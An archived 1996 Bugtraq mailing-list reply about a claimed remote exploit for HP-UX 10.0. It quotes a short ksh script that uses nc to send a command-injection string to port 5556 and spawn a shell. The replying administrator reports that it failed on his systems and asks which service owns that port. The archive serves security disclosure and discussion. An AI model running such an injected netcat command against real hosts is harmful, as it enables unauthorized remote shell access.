Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com

Neohapsis > Archives > Bugtraq> 1996_4

Bugtraq archives for 4th quarter (Oct-Dec) 1996: Re: BoS: SOD remote exploit

Re: BoS: SOD remote exploit

Erik Fichtner (emfpls.com)
Mon, 14 Oct 1996 13:43:43 -0400

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Jeff Weisberg: "Re: Excellent host SYN-attack fix for BSD hosts"
Previous message: Jeff Weisberg: "Re: Excellent host SYN-attack fix for BSD hosts"
Maybe in reply to: Julian Assange: "BoS: SOD remote exploit"
Next in thread: David Schwartz: "Re: BoS: SOD remote exploit"

Julian Assange wrote:
>
> #!/bin/ksh
> echo ' 11T ;/bin/ksh' | nc $1 5556
> # Yup, that's it.  That's the hole.. Believe it.
>
> HP-UX 10.0,
> haven't tested it personally.
>

I tried this a couple weeks ago when the SOD folks started publicizing
their web page and supposed exploits..

it didnt work.. theres no deamon listening on that port on any of our
9 or 10 hpux systems.   So, it's nothing that a default install by a
HPUX-clueless admin such as myself installs.

Anyone know what this port 5556 belongs to?  /etc/services doesnt
have an entry for it.

be nice to know what this belonged to so it doesnt accidentally get
installed.

--
Erik Fichtner           Systems Administrator, PLS              emfpls.com
                        'Your agonizer, please...'

Next message: Jeff Weisberg: "Re: Excellent host SYN-attack fix for BSD hosts"
Previous message: Jeff Weisberg: "Re: Excellent host SYN-attack fix for BSD hosts"
Maybe in reply to: Julian Assange: "BoS: SOD remote exploit"
Next in thread: David Schwartz: "Re: BoS: SOD remote exploit"